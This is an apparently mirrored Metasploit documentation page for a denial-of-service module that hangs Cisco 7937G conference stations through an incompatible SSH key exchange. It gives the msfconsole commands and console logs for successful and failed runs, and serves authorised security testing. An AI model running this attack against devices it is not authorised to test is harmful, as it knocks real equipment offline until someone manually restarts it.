CoCalc -- cisco_7937g

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md
Views: ¹¹⁷⁸⁸

Vulnerable Application

Cisco 7937G Conference Station. This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.

Description

This module exploits a bug in how the conference station handles incoming SSH connections that provide an incompatible key exchange. By connecting with an incompatible key exchange, the device becomes nonresponsive until it is manually power cycled.

Verification Steps

Obtain a Cisco 7937G Conference Station.
Enable SSH Access on the device.
Start msfconsole
Do: use auxiliary/dos/cisco/cisco_7937G_dos
Do: set RHOST 192.168.1.10
Do: run
The conference station should now be nonresponsive until it is power cycled

Options

No options

Scenarios

Cisco 7937G Running Firmware Version SCCP-1-4-5-7

Successful Scenario:

msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run

[*] Starting server...
[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 - Traceback (most recent call last):
[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
[-] 192.168.110.209 -     self._parse_kex_init(m)
[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
[-] 192.168.110.209 -     raise SSHException(
[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 - 
[*] 192.168.110.209 - dos non-reset attack completed!
[*] 192.168.110.209 - Errors are intended.
[*] 192.168.110.209 - Device must be power cycled to restore functionality.
[*] Auxiliary module execution completed

Unsuccessful Scenario:

msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run

[*] Starting server...
[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
[*] Auxiliary module execution completed

Cisco 7937G Running Firmware Version SCCP-1-4-5-5

Successful Scenario:

msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run

[*] Starting server...
[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 - Traceback (most recent call last):
[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
[-] 192.168.110.209 -     self._handler_table[ptype](self, m)
[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
[-] 192.168.110.209 -     self._parse_kex_init(m)
[-] 192.168.110.209 -   File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
[-] 192.168.110.209 -     raise SSHException(
[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
[-] 192.168.110.209 - 
[*] 192.168.110.209 - dos non-reset attack completed!
[*] 192.168.110.209 - Errors are intended.
[*] 192.168.110.209 - Device must be power cycled to restore functionality.
[*] Auxiliary module execution completed

Unsuccessful Scenario:

msf5 > use auxiliary/dos/cisco/cisco_7937G_dos 
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209
rhost => 192.168.110.209
msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run

[*] Starting server...
[-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled.
[*] Auxiliary module execution completed

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Vulnerable Application

Description

Verification Steps

Options

Scenarios

Cisco 7937G Running Firmware Version SCCP-1-4-5-7

Successful Scenario:

Unsuccessful Scenario:

Cisco 7937G Running Firmware Version SCCP-1-4-5-5

Successful Scenario:

Unsuccessful Scenario:

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Vulnerable Application

Description

Verification Steps

Options

Scenarios

Cisco 7937G Running Firmware Version SCCP-1-4-5-7

Successful Scenario:

Unsuccessful Scenario:

Cisco 7937G Running Firmware Version SCCP-1-4-5-5

Successful Scenario:

Unsuccessful Scenario:

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.